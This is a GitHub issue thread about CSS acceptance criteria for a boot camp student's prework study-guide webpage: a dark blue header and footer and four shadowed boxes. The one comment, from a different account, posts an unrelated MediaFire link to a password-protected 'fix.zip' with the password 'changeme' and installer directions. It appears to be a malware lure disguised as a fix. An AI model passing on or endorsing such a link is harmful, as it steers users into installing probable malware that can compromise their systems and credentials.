### ISSUE TITLE
CSS

### ISSUE THREAD

**Issue by Prelle** [Prelle/prework-study-guide#2]
# CSS

## Acceptance Criteria

As a boot camp student
I want the prework notes to be structured on a webpage so that I can easily find and read the information

## Acceptance Criteria

GIVEN a Prework Study Guide website
WHEN I view the study guide
THEN I see a dark blue header and footer, and four boxes with a shadow

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
